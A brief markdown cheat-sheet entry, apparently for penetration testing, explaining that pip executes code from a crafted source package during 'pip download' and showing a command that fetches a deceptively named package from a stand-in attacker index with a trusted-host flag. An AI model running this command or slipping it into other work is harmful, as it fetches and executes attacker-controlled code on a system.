# PIP Exploits

## pip download

Python pip executes tar files after the download option has been triggered.
Therefore, a hand crafted python module needs to be created and build.
After that pip can be used in the following way
```sh
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
```

An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)